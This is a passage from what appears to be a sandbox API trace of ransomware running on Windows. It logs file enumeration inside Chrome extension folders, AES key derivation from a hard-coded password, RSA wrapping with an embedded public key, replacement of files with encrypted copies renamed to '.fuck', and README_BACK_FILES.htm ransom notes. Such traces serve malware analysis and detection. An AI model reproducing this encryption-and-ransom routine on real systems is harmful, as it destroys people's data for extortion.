"c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json")) returned 0x20 [0250.082] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json", dwFileAttributes=0x80) returned 1 [0250.083] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.083] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.084] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.085] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2940538) returned 1 [0250.087] CryptCreateHash (in: hProv=0x2940538, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.087] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0250.087] CryptHashData (hHash=0x2938978, pbData=0x28cb620, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.087] CryptDeriveKey (in: hProv=0x2940538, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937f38) returned 1 [0250.087] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.087] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.087] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2939278) returned 1 [0250.088] CryptImportPublicKeyInfo (in: hCryptProv=0x2939278, dwCertEncodingType=0x1, pInfo=0x2934a80*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2934ab0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2934ab8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2938338) returned 1 [0250.088] CryptEncrypt (in: hKey=0x2938338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.088] CryptEncrypt (in: hKey=0x2938338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2939960*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2939960*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.088] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2939960*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2939960*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.089] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xf3, lpOverlapped=0x0) returned 1 [0250.090] CryptEncrypt (in: hKey=0x2937f38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x100) returned 1 [0250.090] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x100, lpOverlapped=0x0) returned 1 [0250.091] CloseHandle (hObject=0x5d58) returned 1 [0250.091] CloseHandle (hObject=0x5d5c) returned 1 [0250.091] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json"), bFailIfExists=0) returned 1 [0250.094] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json", dwFileAttributes=0x0) returned 1 [0250.094] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json.gsg")) returned 1 [0250.095] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\messages.json.fuck")) returned 1 [0250.096] CryptDestroyHash (hHash=0x2938978) returned 1 [0250.096] CryptDestroyKey (hKey=0x2937f38) returned 1 [0250.096] CryptReleaseContext (hProv=0x2940538, dwFlags=0x0) returned 1 [0250.096] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.096] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0250.097] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\readme_back_files.htm")) returned 0xffffffff [0250.097] AreFileApisANSI () returned 1 [0250.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3700, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.097] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\da\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.097] GetFileType (hFile=0x5d54) returned 0x1 [0250.097] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.098] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.098] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0250.099] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.099] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.099] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.099] GetLastError () returned 0x0 [0250.099] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json")) returned 0x20 [0250.099] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json", dwFileAttributes=0x80) returned 1 [0250.100] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.101] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.102] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.103] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2940538) returned 1 [0250.104] CryptCreateHash (in: hProv=0x2940538, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.104] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0250.104] CryptHashData (hHash=0x2938978, pbData=0x28cb440, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.104] CryptDeriveKey (in: hProv=0x2940538, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937d78) returned 1 [0250.105] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.105] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.105] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2939300) returned 1 [0250.105] CryptImportPublicKeyInfo (in: hCryptProv=0x2939300, dwCertEncodingType=0x1, pInfo=0x29348e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2934910*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2934918*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937ef8) returned 1 [0250.105] CryptEncrypt (in: hKey=0x2937ef8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.105] CryptEncrypt (in: hKey=0x2937ef8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2939168*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2939168*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.105] WriteFile (in: hFile=0x5d58, lpBuffer=0x2939168*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2939168*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.106] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x100, lpOverlapped=0x0) returned 1 [0250.107] CryptEncrypt (in: hKey=0x2937d78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x100, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0250.107] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0250.107] CloseHandle (hObject=0x5d5c) returned 1 [0250.108] CloseHandle (hObject=0x5d58) returned 1 [0250.108] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json"), bFailIfExists=0) returned 1 [0250.110] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json", dwFileAttributes=0x0) returned 1 [0250.110] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json.gsg")) returned 1 [0250.111] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\messages.json.fuck")) returned 1 [0250.112] CryptDestroyHash (hHash=0x2938978) returned 1 [0250.112] CryptDestroyKey (hKey=0x2937d78) returned 1 [0250.112] CryptReleaseContext (hProv=0x2940538, dwFlags=0x0) returned 1 [0250.112] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.112] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0250.112] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\readme_back_files.htm")) returned 0xffffffff [0250.113] AreFileApisANSI () returned 1 [0250.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3700, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.113] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\de\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.113] GetFileType (hFile=0x5d54) returned 0x1 [0250.113] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.114] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.114] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0250.117] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.118] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.118] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.118] GetLastError () returned 0x0 [0250.118] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json")) returned 0x20 [0250.118] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json", dwFileAttributes=0x80) returned 1 [0250.119] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.119] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.120] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\el\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.120] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2940538) returned 1 [0250.122] CryptCreateHash (in: hProv=0x2940538, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.122] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0250.122] CryptHashData (hHash=0x2938978, pbData=0x28cb418, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.122] CryptDeriveKey (in: hProv=0x2940538, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937f38) returned 1 [0250.122] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.122] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.122] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2939388) returned 1 [0250.123] CryptImportPublicKeyInfo (in: hCryptProv=0x2939388, dwCertEncodingType=0x1, pInfo=0x2934e90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2934ec0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2934ec8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937fb8) returned 1 [0250.123] CryptEncrypt (in: hKey=0x2937fb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.123] CryptEncrypt (in: hKey=0x2937fb8, 